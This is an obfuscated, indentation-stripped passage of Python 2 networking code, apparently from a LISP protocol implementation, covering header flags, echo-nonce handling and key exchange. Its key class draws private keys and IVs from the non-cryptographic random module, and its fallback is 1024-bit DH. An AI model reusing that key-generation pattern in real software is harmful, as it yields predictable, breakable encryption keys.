if ( len ( iIiIi111 ) == 2 ) :
iIiIi111 = socket . ntohs ( struct . unpack ( "H" , iIiIi111 ) [ 0 ] )
iiIiIIIIiI += ", icmp-seq {}" . format ( iIiIi111 )
if 1 - 1: I1Ii111 * OoOoOO00
if 100 - 100: I1ii11iIi11i / O0 / ooOoO0o + I1ii11iIi11i
if ( self . packet_error != "" ) :
iiIiIIIIiI += " ({})" . format ( self . packet_error )
if 48 - 48: OoooooooOO . iII111i + O0
iiIiIIIIiI += "\n"
return ( iiIiIIIIiI )
if 85 - 85: II111iiii - Ii1I
if 93 - 93: IiII / i11iIiiIii - oO0o + OoO0O00 / i1IIi
def is_trace ( self ) :
Oo0OOoI1i1i1IIi1I = [ self . inner_sport , self . inner_dport ]
return ( self . inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in Oo0OOoI1i1i1IIi1I )
if 62 - 62: I1ii11iIi11i / OoooooooOO * I1IiiI - i1IIi
if 81 - 81: oO0o / O0 * ooOoO0o % OoOoOO00 / O0
if 85 - 85: OoooooooOO + OoooooooOO
if 23 - 23: i1IIi
if 31 - 31: Oo0Ooo - iIii1I11I1II1 / I11i . OoO0O00
if 74 - 74: Oo0Ooo - II111iiii - IiII
if 50 - 50: I1IiiI - oO0o + oO0o * I11i + oO0o
if 70 - 70: i1IIi % OoO0O00 / i1IIi
if 30 - 30: OoOoOO00 - i11iIiiIii
if 94 - 94: OoOoOO00 % iII111i
if 39 - 39: OoOoOO00 + I1Ii111 % O0
if 26 - 26: ooOoO0o + OoOoOO00
if 17 - 17: I1ii11iIi11i - iII111i % Oo0Ooo * O0 % O0 * OOooOOo
if 6 - 6: I1Ii111
if 46 - 46: II111iiii * I1Ii111
if 23 - 23: i1IIi - O0
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
if 6 - 6: ooOoO0o % OoooooooOO * I1Ii111 - IiII
class lisp_data_header ( ) :
def __init__ ( self ) :
self . first_long = 0
self . second_long = 0
self . k_bits = 0
if 24 - 24: I11i / iIii1I11I1II1 . OoooooooOO % OoOoOO00 . Ii1I
if 73 - 73: I1Ii111
def print_header ( self , e_or_d ) :
i1IiIiiiii11 = lisp_hex_string ( self . first_long & 0xffffff )
oooo = lisp_hex_string ( self . second_long ) . zfill ( 8 )
if 65 - 65: Oo0Ooo . OoOoOO00 . OOooOOo % o0oOOo0O0Ooo + OoO0O00
I111 = ( "{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + "iid/lsb: {}" )
if 53 - 53: Oo0Ooo * I11i - Ii1I % OoO0O00 - OoOoOO00 - iII111i
return ( I111 . format ( bold ( e_or_d , False ) ,
"N" if ( self . first_long & LISP_N_BIT ) else "n" ,
"L" if ( self . first_long & LISP_L_BIT ) else "l" ,
"E" if ( self . first_long & LISP_E_BIT ) else "e" ,
"V" if ( self . first_long & LISP_V_BIT ) else "v" ,
"I" if ( self . first_long & LISP_I_BIT ) else "i" ,
"P" if ( self . first_long & LISP_P_BIT ) else "p" ,
"K" if ( self . k_bits in [ 2 , 3 ] ) else "k" ,
"K" if ( self . k_bits in [ 1 , 3 ] ) else "k" ,
i1IiIiiiii11 , oooo ) )
if 21 - 21: II111iiii + OoO0O00 - Oo0Ooo + I1IiiI
if 20 - 20: OoO0O00
def encode ( self ) :
o00OooooOOOO = "II"
i1IiIiiiii11 = socket . htonl ( self . first_long )
oooo = socket . htonl ( self . second_long )
if 89 - 89: O0 + IiII * I1Ii111
iIIIIII = struct . pack ( o00OooooOOOO , i1IiIiiiii11 , oooo )
return ( iIIIIII )
if 48 - 48: OoOoOO00 * OoooooooOO + OoooooooOO * iIii1I11I1II1 * II111iiii % i11iIiiIii
if 22 - 22: OoO0O00 . OoOoOO00 % II111iiii - O0
def decode ( self , packet ) :
o00OooooOOOO = "II"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( False )
if 7 - 7: Oo0Ooo * OoO0O00 - II111iiii % I1Ii111 . Oo0Ooo . Oo0Ooo
i1IiIiiiii11 , oooo = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 5 - 5: OoooooooOO * I1ii11iIi11i
if 42 - 42: o0oOOo0O0Ooo . I1Ii111 / O0 . II111iiii * OoOoOO00
self . first_long = socket . ntohl ( i1IiIiiiii11 )
self . second_long = socket . ntohl ( oooo )
self . k_bits = ( self . first_long & LISP_K_BITS ) >> 24
return ( True )
if 7 - 7: I1Ii111 * O0 + OoOoOO00
if 90 - 90: IiII * II111iiii * IiII - iII111i
def key_id ( self , key_id ) :
self . first_long &= ~ ( 0x3 << 24 )
self . first_long |= ( ( key_id & 0x3 ) << 24 )
self . k_bits = key_id
if 34 - 34: OOooOOo - I1ii11iIi11i * iII111i % Ii1I
if 25 - 25: II111iiii + I1IiiI * ooOoO0o * I1ii11iIi11i . iII111i
def nonce ( self , nonce ) :
self . first_long |= LISP_N_BIT
self . first_long |= nonce
if 26 - 26: iII111i - ooOoO0o / OoooooooOO + o0oOOo0O0Ooo . Oo0Ooo
if 75 - 75: O0 / OoOoOO00 . I1Ii111
def map_version ( self , version ) :
self . first_long |= LISP_V_BIT
self . first_long |= version
if 7 - 7: OoO0O00 * iII111i
if 16 - 16: I1Ii111 . i1IIi . IiII
def instance_id ( self , iid ) :
if ( iid == 0 ) : return
self . first_long |= LISP_I_BIT
self . second_long &= 0xff
self . second_long |= ( iid << 8 )
if 50 - 50: OoO0O00 - II111iiii * OoooooooOO - I1IiiI . O0 + O0
if 80 - 80: o0oOOo0O0Ooo
def get_instance_id ( self ) :
return ( ( self . second_long >> 8 ) & 0xffffff )
if 50 - 50: ooOoO0o
if 81 - 81: i11iIiiIii * iIii1I11I1II1 / Oo0Ooo * OOooOOo
def locator_status_bits ( self , lsbs ) :
self . first_long |= LISP_L_BIT
self . second_long &= 0xffffff00
self . second_long |= ( lsbs & 0xff )
if 83 - 83: i11iIiiIii - I1IiiI * i11iIiiIii
if 59 - 59: iII111i - OoooooooOO / ooOoO0o + I1ii11iIi11i . o0oOOo0O0Ooo - iII111i
def is_request_nonce ( self , nonce ) :
return ( nonce & 0x80000000 )
if 29 - 29: oO0o
if 26 - 26: O0 % OOooOOo - IiII . OOooOOo
def request_nonce ( self , nonce ) :
self . first_long |= LISP_E_BIT
self . first_long |= LISP_N_BIT
self . first_long |= ( nonce & 0xffffff )
if 70 - 70: o0oOOo0O0Ooo + I11i / iII111i + ooOoO0o / I1IiiI
if 33 - 33: OoooooooOO . O0
def is_e_bit_set ( self ) :
return ( self . first_long & LISP_E_BIT )
if 59 - 59: iIii1I11I1II1
if 45 - 45: O0
def get_nonce ( self ) :
return ( self . first_long & 0xffffff )
if 78 - 78: I11i - iIii1I11I1II1 + I1Ii111 - I1ii11iIi11i - I1Ii111
if 21 - 21: OoooooooOO . O0 / i11iIiiIii
if 86 - 86: OoOoOO00 / OOooOOo
class lisp_echo_nonce ( ) :
def __init__ ( self , rloc_str ) :
self . rloc_str = rloc_str
self . rloc = lisp_address ( LISP_AFI_NONE , rloc_str , 0 , 0 )
self . request_nonce_sent = None
self . echo_nonce_sent = None
self . last_request_nonce_sent = None
self . last_new_request_nonce_sent = None
self . last_echo_nonce_sent = None
self . last_new_echo_nonce_sent = None
self . request_nonce_rcvd = None
self . echo_nonce_rcvd = None
self . last_request_nonce_rcvd = None
self . last_echo_nonce_rcvd = None
self . last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list [ rloc_str ] = self
if 40 - 40: iIii1I11I1II1 / ooOoO0o / I1IiiI + I1ii11iIi11i * OOooOOo
if 1 - 1: OoO0O00 * ooOoO0o + IiII . oO0o / ooOoO0o
def send_ipc ( self , ipc_socket , ipc ) :
O0O00Oo = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
oO00o0oOoo = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc ( ipc , O0O00Oo )
lisp_ipc ( ipc , ipc_socket , oO00o0oOoo )
if 49 - 49: i1IIi - OOooOOo / o0oOOo0O0Ooo % IiII - ooOoO0o
if 62 - 62: I1Ii111 + OoOoOO00 % o0oOOo0O0Ooo % o0oOOo0O0Ooo
def send_request_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
oOO0O = "nonce%R%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , oOO0O )
if 88 - 88: oO0o * I1IiiI / OoO0O00 - OOooOOo / i1IIi . I1Ii111
if 26 - 26: i11iIiiIii - ooOoO0o
def send_echo_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
oOO0O = "nonce%E%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , oOO0O )
if 45 - 45: ooOoO0o + II111iiii % iII111i
if 55 - 55: ooOoO0o - oO0o % I1IiiI
def receive_request ( self , ipc_socket , nonce ) :
ooOooo0OoOo0o = self . request_nonce_rcvd
self . request_nonce_rcvd = nonce
self . last_request_nonce_rcvd = lisp_get_timestamp ( )
if ( lisp_i_am_rtr ) : return
if ( ooOooo0OoOo0o != nonce ) : self . send_request_ipc ( ipc_socket , nonce )
if 65 - 65: iIii1I11I1II1 . II111iiii % OOooOOo - I1Ii111 + OoooooooOO / O0
if 94 - 94: o0oOOo0O0Ooo - O0
def receive_echo ( self , ipc_socket , nonce ) :
if ( self . request_nonce_sent != nonce ) : return
self . last_echo_nonce_rcvd = lisp_get_timestamp ( )
if ( self . echo_nonce_rcvd == nonce ) : return
if 99 - 99: i11iIiiIii * Ii1I / I1Ii111 % iIii1I11I1II1 * iIii1I11I1II1 + Ii1I
self . echo_nonce_rcvd = nonce
if ( lisp_i_am_rtr ) : return
self . send_echo_ipc ( ipc_socket , nonce )
if 78 - 78: OOooOOo . O0 / Ii1I
if 36 - 36: I1Ii111 / I1Ii111 % oO0o
def get_request_or_echo_nonce ( self , ipc_socket , remote_rloc ) :
if 97 - 97: OoooooooOO * o0oOOo0O0Ooo + OoooooooOO % Ii1I * Oo0Ooo
if 35 - 35: iIii1I11I1II1 % iII111i - i1IIi
if 20 - 20: I11i % ooOoO0o . OOooOOo / I1Ii111
if 50 - 50: oO0o + i11iIiiIii / i11iIiiIii + ooOoO0o + I1Ii111
if 65 - 65: ooOoO0o * O0 * iII111i
if ( self . request_nonce_sent and self . echo_nonce_sent and remote_rloc ) :
OoOOOo0oo = lisp_myrlocs [ 0 ] if remote_rloc . is_ipv4 ( ) else lisp_myrlocs [ 1 ]
if 83 - 83: O0 * I1IiiI
if 97 - 97: II111iiii
if ( remote_rloc . address > OoOOOo0oo . address ) :
O0o00O0Oo0 = "exit"
self . request_nonce_sent = None
else :
O0o00O0Oo0 = "stay in"
self . echo_nonce_sent = None
if 38 - 38: I1IiiI
if 42 - 42: o0oOOo0O0Ooo
ii1i1 = bold ( "collision" , False )
o0000oO = red ( OoOOOo0oo . print_address_no_iid ( ) , False )
O0OooO0oo = red ( remote_rloc . print_address_no_iid ( ) , False )
lprint ( "Echo nonce {}, {} -> {}, {} request-nonce mode" . format ( ii1i1 ,
o0000oO , O0OooO0oo , O0o00O0Oo0 ) )
if 81 - 81: iII111i / I1ii11iIi11i
if 55 - 55: o0oOOo0O0Ooo % OOooOOo - I1ii11iIi11i / IiII / i11iIiiIii % I1Ii111
if 43 - 43: O0 / I1Ii111 . iIii1I11I1II1 - OoOoOO00
if 47 - 47: II111iiii - I1ii11iIi11i - Ii1I
if 9 - 9: I1ii11iIi11i - IiII
if ( self . echo_nonce_sent != None ) :
OO00OO = self . echo_nonce_sent
o0OoO00 = bold ( "Echoing" , False )
lprint ( "{} nonce 0x{} to {}" . format ( o0OoO00 ,
lisp_hex_string ( OO00OO ) , red ( self . rloc_str , False ) ) )
self . last_echo_nonce_sent = lisp_get_timestamp ( )
self . echo_nonce_sent = None
return ( OO00OO )
if 64 - 64: i1IIi
if 71 - 71: IiII * o0oOOo0O0Ooo
if 99 - 99: o0oOOo0O0Ooo
if 28 - 28: OoooooooOO % O0 - OOooOOo / o0oOOo0O0Ooo / I1IiiI
if 41 - 41: II111iiii * IiII / OoO0O00 . oO0o
if 50 - 50: OoooooooOO + iIii1I11I1II1 / oO0o / OOooOOo . i11iIiiIii . ooOoO0o
if 75 - 75: iIii1I11I1II1 % ooOoO0o / OOooOOo - iII111i % i11iIiiIii
OO00OO = self . request_nonce_sent
i11 = self . last_request_nonce_sent
if ( OO00OO and i11 != None ) :
if ( time . time ( ) - i11 >= LISP_NONCE_ECHO_INTERVAL ) :
self . request_nonce_sent = None
lprint ( "Stop request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( OO00OO ) ) )
if 87 - 87: OOooOOo + OOooOOo
return ( None )
if 45 - 45: i1IIi - Oo0Ooo
if 87 - 87: OoOoOO00 - OoO0O00 * OoO0O00 / Ii1I . I11i * o0oOOo0O0Ooo
if 21 - 21: II111iiii
if 29 - 29: OoOoOO00 % Ii1I
if 7 - 7: i1IIi / IiII / iII111i
if 97 - 97: OoO0O00 + iIii1I11I1II1
if 79 - 79: ooOoO0o + oO0o - II111iiii . Oo0Ooo
if 26 - 26: IiII
if 52 - 52: O0 + ooOoO0o
if ( OO00OO == None ) :
OO00OO = lisp_get_data_nonce ( )
if ( self . recently_requested ( ) ) : return ( OO00OO )
if 11 - 11: i1IIi / I1Ii111 * I1ii11iIi11i * I1Ii111 * ooOoO0o - i11iIiiIii
self . request_nonce_sent = OO00OO
lprint ( "Start request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( OO00OO ) ) )
if 96 - 96: I1ii11iIi11i % I1ii11iIi11i
self . last_new_request_nonce_sent = lisp_get_timestamp ( )
if 1 - 1: I1IiiI . Ii1I
if 26 - 26: oO0o - ooOoO0o % Oo0Ooo - oO0o + IiII
if 33 - 33: Ii1I + OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1 % i1IIi * IiII
if 21 - 21: O0 * ooOoO0o % OoO0O00
if 14 - 14: O0 / I1Ii111 / ooOoO0o + IiII - IiII
if ( lisp_i_am_itr == False ) : return ( OO00OO | 0x80000000 )
self . send_request_ipc ( ipc_socket , OO00OO )
else :
lprint ( "Continue request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( OO00OO ) ) )
if 10 - 10: O0 - I1ii11iIi11i / I1Ii111 % OoOoOO00 / OoooooooOO / Ii1I
if 73 - 73: ooOoO0o + IiII % o0oOOo0O0Ooo . I1ii11iIi11i / OOooOOo . I1Ii111
if 76 - 76: I11i . I1ii11iIi11i * OoooooooOO % iII111i
if 24 - 24: OoooooooOO
if 83 - 83: O0 / OoO0O00
if 62 - 62: I11i
if 73 - 73: Ii1I % OoO0O00 * OOooOOo
self . last_request_nonce_sent = lisp_get_timestamp ( )
return ( OO00OO | 0x80000000 )
if 84 - 84: Oo0Ooo
if 18 - 18: OoooooooOO
def request_nonce_timeout ( self ) :
if ( self . request_nonce_sent == None ) : return ( False )
if ( self . request_nonce_sent == self . echo_nonce_rcvd ) : return ( False )
if 85 - 85: OoooooooOO . OoO0O00 . OoO0O00
o0O0oO0 = time . time ( ) - self . last_request_nonce_sent
o00O0O0OoO = self . last_echo_nonce_rcvd
return ( o0O0oO0 >= LISP_NONCE_ECHO_INTERVAL and o00O0O0OoO == None )
if 83 - 83: i1IIi - OoooooooOO + OoO0O00 * I1IiiI
if 61 - 61: iII111i % II111iiii / OoOoOO00 % I1ii11iIi11i . iIii1I11I1II1 % O0
def recently_requested ( self ) :
o00O0O0OoO = self . last_request_nonce_sent
if ( o00O0O0OoO == None ) : return ( False )
if 74 - 74: I1ii11iIi11i * oO0o + iII111i % O0
o0O0oO0 = time . time ( ) - o00O0O0OoO
return ( o0O0oO0 <= LISP_NONCE_ECHO_INTERVAL )
if 18 - 18: i1IIi % IiII . O0 - O0 - O0 - II111iiii
if 55 - 55: OoOoOO00 . iIii1I11I1II1 * OOooOOo % iIii1I11I1II1 . OoO0O00
def recently_echoed ( self ) :
if ( self . request_nonce_sent == None ) : return ( True )
if 43 - 43: Ii1I . OOooOOo + I1IiiI * i11iIiiIii
if 2 - 2: OOooOOo
if 3 - 3: I1IiiI . iII111i % O0 - ooOoO0o / O0
if 79 - 79: Ii1I + oO0o % ooOoO0o % I1IiiI
o00O0O0OoO = self . last_good_echo_nonce_rcvd
if ( o00O0O0OoO == None ) : o00O0O0OoO = 0
o0O0oO0 = time . time ( ) - o00O0O0OoO
if ( o0O0oO0 <= LISP_NONCE_ECHO_INTERVAL ) : return ( True )
if 68 - 68: II111iiii - OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo % II111iiii
if 53 - 53: iII111i . oO0o / Oo0Ooo . OoO0O00 . i11iIiiIii
if 60 - 60: II111iiii
if 25 - 25: Oo0Ooo + o0oOOo0O0Ooo - OoO0O00
if 57 - 57: II111iiii . i1IIi
if 33 - 33: iII111i + Oo0Ooo % I11i . oO0o
o00O0O0OoO = self . last_new_request_nonce_sent
if ( o00O0O0OoO == None ) : o00O0O0OoO = 0
o0O0oO0 = time . time ( ) - o00O0O0OoO
return ( o0O0oO0 <= LISP_NONCE_ECHO_INTERVAL )
if 6 - 6: IiII + I1ii11iIi11i
if 62 - 62: oO0o . I1Ii111 - OoooooooOO * II111iiii . i11iIiiIii
def change_state ( self , rloc ) :
if ( rloc . up_state ( ) and self . recently_echoed ( ) == False ) :
iiIIiIi1i1I1 = bold ( "down" , False )
oOoooo0OooO = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
lprint ( "Take {} {}, last good echo: {}" . format ( red ( self . rloc_str , False ) , iiIIiIi1i1I1 , oOoooo0OooO ) )
if 67 - 67: OoooooooOO + OoO0O00 / Oo0Ooo % o0oOOo0O0Ooo % i1IIi
rloc . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc . last_state_change = lisp_get_timestamp ( )
return
if 31 - 31: IiII . II111iiii % Oo0Ooo * Ii1I + Ii1I
if 87 - 87: OoO0O00
if ( rloc . no_echoed_nonce_state ( ) == False ) : return
if 23 - 23: OOooOOo + ooOoO0o / i11iIiiIii * Oo0Ooo . OoO0O00
if ( self . recently_requested ( ) == False ) :
i1I111II = bold ( "up" , False )
lprint ( "Bring {} {}, retry request-nonce mode" . format ( red ( self . rloc_str , False ) , i1I111II ) )
if 51 - 51: I1IiiI * ooOoO0o
rloc . state = LISP_RLOC_UP_STATE
rloc . last_state_change = lisp_get_timestamp ( )
if 47 - 47: OOooOOo . OOooOOo . IiII . I1Ii111 / i1IIi
if 77 - 77: II111iiii % I11i / Oo0Ooo
if 23 - 23: iIii1I11I1II1
def print_echo_nonce ( self ) :
I11IIiII = lisp_print_elapsed ( self . last_request_nonce_sent )
iii111 = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
if 96 - 96: o0oOOo0O0Ooo - I1IiiI % OoOoOO00 + OoO0O00 - IiII - IiII
i1ii1iiI1iI = lisp_print_elapsed ( self . last_echo_nonce_sent )
Ii1i1 = lisp_print_elapsed ( self . last_request_nonce_rcvd )
o0 = space ( 4 )
if 42 - 42: oO0o
o0OooooOoOO = "Nonce-Echoing:\n"
o0OooooOoOO += ( "{}Last request-nonce sent: {}\n{}Last echo-nonce " + "received: {}\n" ) . format ( o0 , I11IIiII , o0 , iii111 )
if 22 - 22: iIii1I11I1II1 % I1IiiI . O0
o0OooooOoOO += ( "{}Last request-nonce received: {}\n{}Last echo-nonce " + "sent: {}" ) . format ( o0 , Ii1i1 , o0 , i1ii1iiI1iI )
if 13 - 13: II111iiii % i1IIi - OoOoOO00 + iII111i
if 59 - 59: OoooooooOO + I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 . I1IiiI
return ( o0OooooOoOO )
if 42 - 42: I1Ii111
if 70 - 70: o0oOOo0O0Ooo / I11i + oO0o % I1IiiI % Oo0Ooo + OoO0O00
if 80 - 80: OOooOOo
if 12 - 12: Ii1I
if 2 - 2: OoooooooOO
if 100 - 100: Oo0Ooo / O0 * i11iIiiIii * OoooooooOO
if 46 - 46: O0 % OoooooooOO
if 22 - 22: iII111i + OoooooooOO - OoOoOO00 - OoO0O00 * I1Ii111 - oO0o
if 99 - 99: ooOoO0o / I1IiiI . Ii1I - Ii1I * I1IiiI
class lisp_keys ( ) :
def __init__ ( self , key_id , do_curve = True , do_chacha = use_chacha ,
do_poly = use_poly ) :
self . uptime = lisp_get_timestamp ( )
self . last_rekey = None
self . rekey_count = 0
self . use_count = 0
self . key_id = key_id
self . cipher_suite = LISP_CS_1024
self . dh_g_value = LISP_CS_1024_G
self . dh_p_value = LISP_CS_1024_P
self . curve25519 = None
self . cipher_suite_string = ""
if ( do_curve ) :
if ( do_chacha ) :
self . cipher_suite = LISP_CS_25519_CHACHA
self . cipher_suite_string = "chacha"
elif ( os . getenv ( "LISP_USE_AES_GCM" ) != None ) :
self . cipher_suite = LISP_CS_25519_GCM
self . cipher_suite_string = "aes-gcm"
else :
self . cipher_suite = LISP_CS_25519_CBC
self . cipher_suite_string = "aes-cbc"
if 24 - 24: I11i * OoO0O00 - oO0o / iIii1I11I1II1 - Oo0Ooo . OOooOOo
self . local_private_key = random . randint ( 0 , 2 ** 128 - 1 )
iII1 = lisp_hex_string ( self . local_private_key ) . zfill ( 32 )
self . curve25519 = curve25519 . Private ( iII1 )
else :
self . local_private_key = random . randint ( 0 , 0x1fff )
if 2 - 2: ooOoO0o - O0 - I1ii11iIi11i / I11i * OoOoOO00
self . local_public_key = self . compute_public_key ( )
self . remote_public_key = None
self . shared_key = None
self . encrypt_key = None
self . icv_key = None
self . icv = poly1305 if do_poly else hashlib . sha256
self . iv = None
self . get_iv ( )
self . do_poly = do_poly
if 26 - 26: I1ii11iIi11i + I1Ii111 - oO0o + IiII % OOooOOo
if 84 - 84: I11i % Ii1I % O0 * o0oOOo0O0Ooo
def copy_keypair ( self , key ) :
self . local_private_key = key . local_private_key
self . local_public_key = key . local_public_key
self . curve25519 = key . curve25519
if 15 - 15: oO0o - iIii1I11I1II1 - II111iiii - IiII % I1ii11iIi11i
if 80 - 80: IiII * iII111i . i1IIi % Ii1I % I1ii11iIi11i + ooOoO0o
def get_iv ( self ) :
if ( self . iv == None ) :
self . iv = random . randint ( 0 , LISP_16_128_MASK )
else :
self . iv += 1
if 6 - 6: I1ii11iIi11i . oO0o . OoO0O00 + IiII
oo0O = self . iv
if ( self . cipher_suite == LISP_CS_25519_CHACHA ) :
oo0O = struct . pack ( "Q" , oo0O & LISP_8_64_MASK )
elif ( self . cipher_suite == LISP_CS_25519_GCM ) :
oO0oo0O0OOOo0 = struct . pack ( "I" , ( oo0O >> 64 ) & LISP_4_32_MASK )
iII11I = struct . pack ( "Q" , oo0O & LISP_8_64_MASK )
oo0O = oO0oo0O0OOOo0 + iII11I
else :
oo0O = struct . pack ( "QQ" , oo0O >> 64 , oo0O & LISP_8_64_MASK )
return ( oo0O )
if 44 - 44: iII111i
if 79 - 79: o0oOOo0O0Ooo % OOooOOo . O0
def key_length ( self , key ) :
if ( type ( key ) != str ) : key = self . normalize_pub_key ( key )
return ( len ( key ) / 2 )
if 56 - 56: oO0o + i1IIi * iII111i - O0
if 84 - 84: iII111i % I1IiiI / iIii1I11I1II1 * Ii1I * iIii1I11I1II1 + I1ii11iIi11i
def print_key ( self , key ) :
oo0O0000O0 = self . normalize_pub_key ( key )
return ( "0x{}...{}({})" . format ( oo0O0000O0 [ 0 : 4 ] , oo0O0000O0 [ - 4 : : ] , self . key_length ( oo0O0000O0 ) ) )
if 78 - 78: IiII / iII111i * Ii1I . OOooOOo . oO0o - I1Ii111
if 39 - 39: ooOoO0o . i1IIi + OoooooooOO . iII111i - i11iIiiIii % I1Ii111
def normalize_pub_key ( self , key ) :
if ( type ( key ) == str ) :
if ( self . curve25519 ) : return ( binascii . hexlify ( key ) )
return ( key )
if 38 - 38: oO0o
key = lisp_hex_string ( key ) . zfill ( 256 )
return ( key )
if 9 - 9: I11i . OoO0O00 . oO0o / OoooooooOO
if 59 - 59: iIii1I11I1II1 + i1IIi % II111iiii
def print_keys ( self , do_bold = True ) :
o0000oO = bold ( "local-key: " , False ) if do_bold else "local-key: "
if ( self . local_public_key == None ) :
o0000oO += "none"
else :
o0000oO += self . print_key ( self . local_public_key )
if 2 - 2: II111iiii + I11i . OoO0O00
O0OooO0oo = bold ( "remote-key: " , False ) if do_bold else "remote-key: "
if ( self . remote_public_key == None ) :
O0OooO0oo += "none"
else :
O0OooO0oo += self . print_key ( self . remote_public_key )
if 14 - 14: OOooOOo * I1IiiI - I1ii11iIi11i
I1111I1i1i = "ECDH" if ( self . curve25519 ) else "DH"
O0oOo = self . cipher_suite
return ( "{} cipher-suite: {}, {}, {}" . format ( I1111I1i1i , O0oOo , o0000oO , O0OooO0oo ) )
if 14 - 14: I1Ii111 + I1Ii111 / OoOoOO00 + OoOoOO00 * ooOoO0o / I1Ii111
if 68 - 68: OoooooooOO
def compare_keys ( self , keys ) :
if ( self . dh_g_value != keys . dh_g_value ) : return ( False )
if ( self . dh_p_value != keys . dh_p_value ) : return ( False )
if ( self . remote_public_key != keys . remote_public_key ) : return ( False )
return ( True )
if 38 - 38: iII111i + ooOoO0o
if 32 - 32: ooOoO0o - OoooooooOO + OoO0O00
def compute_public_key ( self ) :
if ( self . curve25519 ) : return ( self . curve25519 . get_public ( ) . public )
if 90 - 90: I1ii11iIi11i / OoooooooOO % i11iIiiIii - IiII
iII1 = self . local_private_key
II1IIiIiiI1iI = self . dh_g_value
iIiiI11II11 = self . dh_p_value
return ( int ( ( II1IIiIiiI1iI ** iII1 ) % iIiiI11II11 ) )
if 75 - 75: I1Ii111 - iII111i . oO0o
if 88 - 88: iII111i - OoooooooOO . ooOoO0o - o0oOOo0O0Ooo / OoOoOO00 % I11i
def compute_shared_key ( self , ed , print_shared = False ) :
iII1 = self . local_private_key
o00O00o = self . remote_public_key
if 69 - 69: i1IIi . Ii1I
oO0O00O0O0o = bold ( "Compute {} shared-key" . format ( ed ) , False )
lprint ( "{}, key-material: {}" . format ( oO0O00O0O0o , self . print_keys ( ) ) )
if 41 - 41: Ii1I . i11iIiiIii + O0 - OoooooooOO * oO0o
if ( self . curve25519 ) :
i1IiI111IiiI1 = curve25519 . Public ( o00O00o )
self . shared_key = self . curve25519 . get_shared_key ( i1IiI111IiiI1 )
else :
iIiiI11II11 = self . dh_p_value
self . shared_key = ( o00O00o ** iII1 ) % iIiiI11II11
if 8 - 8: Oo0Ooo / I1ii11iIi11i + I1ii11iIi11i . Ii1I
if 27 - 27: II111iiii - i11iIiiIii - OoooooooOO
if 90 - 90: I1IiiI
if 4 - 4: OOooOOo % ooOoO0o - OOooOOo - o0oOOo0O0Ooo
if 30 - 30: IiII
if 34 - 34: oO0o - II111iiii - o0oOOo0O0Ooo + iII111i + I1Ii111
if 70 - 70: OoooooooOO + OoO0O00 * Oo0Ooo
if ( print_shared ) :
oo0O0000O0 = self . print_key ( self . shared_key )
lprint ( "Computed shared-key: {}" . format ( oo0O0000O0 ) )
if 20 - 20: i11iIiiIii - II111iiii - ooOoO0o % oO0o . ooOoO0o
if 50 - 50: iIii1I11I1II1 + I1Ii111 - I11i - OoooooooOO
if 84 - 84: OoOoOO00 - I11i
if 80 - 80: i11iIiiIii % OOooOOo - Oo0Ooo % OOooOOo
if 89 - 89: Ii1I * I11i + OoOoOO00 / i11iIiiIii
self . compute_encrypt_icv_keys ( )
if 68 - 68: OoooooooOO * I11i
if 86 - 86: o0oOOo0O0Ooo / OoOoOO00
if 40 - 40: iII111i
if 62 - 62: ooOoO0o / OOooOOo
self . rekey_count += 1
self . last_rekey = lisp_get_timestamp ( )
if 74 - 74: iII111i % I1Ii111 / I1Ii111 - iIii1I11I1II1 - II111iiii + OOooOOo
if 92 - 92: I11i % I1Ii111
def compute_encrypt_icv_keys ( self ) :
I1i1i1 = hashlib . sha256
if ( self . curve25519 ) :
Ii11i1IiII = self . shared_key
else :
Ii11i1IiII = lisp_hex_string ( self . shared_key )
if 96 - 96: i11iIiiIii - OoOoOO00 / iII111i % OoooooooOO / iIii1I11I1II1 - OOooOOo
if 52 - 52: iIii1I11I1II1 * OoOoOO00 + o0oOOo0O0Ooo . I11i
if 59 - 59: iII111i . i1IIi
if 31 - 31: I1IiiI + I1IiiI
if 11 - 11: IiII + OoOoOO00 % o0oOOo0O0Ooo * OoO0O00 / IiII
o0000oO = self . local_public_key
if ( type ( o0000oO ) != long ) : o0000oO = int ( binascii . hexlify ( o0000oO ) , 16 )
O0OooO0oo = self . remote_public_key
if ( type ( O0OooO0oo ) != long ) : O0OooO0oo = int ( binascii . hexlify ( O0OooO0oo ) , 16 )
I11Ii = "0001" + "lisp-crypto" + lisp_hex_string ( o0000oO ^ O0OooO0oo ) + "0100"
if 96 - 96: Oo0Ooo . oO0o + iIii1I11I1II1 * OoOoOO00 - O0
ooo0O0O = hmac . new ( I11Ii , Ii11i1IiII , I1i1i1 ) . hexdigest ( )
ooo0O0O = int ( ooo0O0O , 16 )
if 17 - 17: I1IiiI
if 81 - 81: O0 + Ii1I / Ii1I - OoO0O00 + II111iiii
if 17 - 17: I1IiiI + OOooOOo % o0oOOo0O0Ooo
if 34 - 34: Ii1I * I11i / OoooooooOO - iIii1I11I1II1
O0Ooo00o0OoOo = ( ooo0O0O >> 128 ) & LISP_16_128_MASK
o0000ooOooOO = ooo0O0O & LISP_16_128_MASK
